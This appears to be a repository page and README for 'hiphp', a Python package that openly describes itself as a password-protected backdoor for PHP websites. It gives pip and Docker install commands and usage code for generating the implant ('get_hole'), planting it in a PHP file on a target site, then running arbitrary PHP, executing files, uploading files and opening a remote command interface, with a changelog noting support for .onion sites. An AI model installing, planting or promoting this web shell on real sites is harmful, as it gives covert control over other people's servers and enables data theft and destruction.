Projects STRLCPY hiphp Files
🤬
.github Loading last commit info...
examples
hiphp
screenshot
scripts
CHANGELOG
Dockerfile
LICENSE
README.md
requirements.txt
setup.cfg
setup.py
version.txt
README.md

hiphp for control php websites.

hiphp is BackDoor to control php-based sites hiphp can be controlled by sending commands, files, and tokens to the site using the http/https protocol. After copying the code and placing it in any php file on the target website, you will have permissions to enter it, read all files, delete and even upload new files to it. Also, this back door is password protected.

Python package Docker image CodeFactor

Languages:

* python3 * php

Requirements

[✓] ashar
[✓] requests
[✓] hexor
[✓] asciitext

Supported Distributions:

DistributionVersion CheckPython Test VersionSupportedStatusEverything works
Ubuntu20.04.33.6, 3.7, 3.8, 3.9YesWorkingYes
Windwos11.6.43.6, 3.7, 3.8, 3.9YesNot WorkingNo
MacOS10.0.203483.6, 3.7, 3.8, 3.9YesWorkingYes

Docker pull,build & run:

# pull:
docker pull yasserbdj96/hiphp:latest

# build:
docker build -t docker.io/yasserbdj96/hiphp:latest .

# run:
docker run -e KEY="<KEY>" -e URL="<URL>" -i -t docker.io/yasserbdj96/hiphp:latest

Installation:

pip install hiphp

Usage:

from hiphp import *

# connect:
p1=hiphp(key="<KEY>",url="<URL>")

Examples:

#START{
from hiphp import *

# connect:
p1=hiphp(key="123",url="http://127.0.0.1/index.php")#Default: retu=False.
#p1=hiphp(key="123",url="http://kfdjlkgjflkgjdfkjgkfdjgkjdfkgjk.onion/index.php")
#p1=hiphp(key="123",url="https://google.com/index.php")

# Get the hole Code:
p1.get_hole()# Copy this code into the file whose path you entered earlier. ex: https://localhost/index.php

# Example:1
# Command:
p1.run("echo 'this is a test';")

# Example:2
# Run code from file:
p1.run_file("./examples.php")# Run code from file.
p1.run_file("./examples.php","var1==true","var2==hiii")# Run code from file With the entry of variables.

# Example:3
# Upload a file:
p1.upload("./examples.php")# Upload a file to the current directory.
p1.upload("./examples.php","./upload_path/")# Upload a file to a specific directory.

# Example:4
# Command line interface:
p1.cli()
#}END.

Screenshot:

Changelog History:

## 0.2.15 [22-06-2022]
 - New build.
 - More stability.
 - Command interface update.
 - More commands.
 - Giving access to .onion sites.
 - help menu update.
 - Bug fixes & performance improvements.

## 0.1.14
 - help menu update.
 - Bug fixes & performance improvements.

## 0.1.13
 - Safety upgrade.
 - Bug fixes & performance improvements.

## 0.1.12
 - Safety upgrade.
 - Bug fixes & performance improvements.

## 0.1.11
 - Command interface update.
 - Bug fixes & performance improvements.

## 0.1.10
 - Fix Bugs.

## 0.1.9
 - fix bugs.

## 0.1.7
 - fix bugs.

## 0.1.6
 - fix bugs.
 - add upload to upload any file.
 - Simplify the use of the program.

## 0.1.5
 - fix bugs.

## 0.1.4
 - fix bugs.
 - new build.

## 0.1.1
 - Import pakages by pipincluder.
 - Fix bugs.

## 0.1.0
 - New build.
 - Fix bugs.

## 0.0.4
 - Fix bugs.

## 0.0.2
 - Fix bugs.
 - Add help list.
 - Add Executing from files.

## 0.0.1
 - First public release.

Please wait...
Page is in error, reload to recover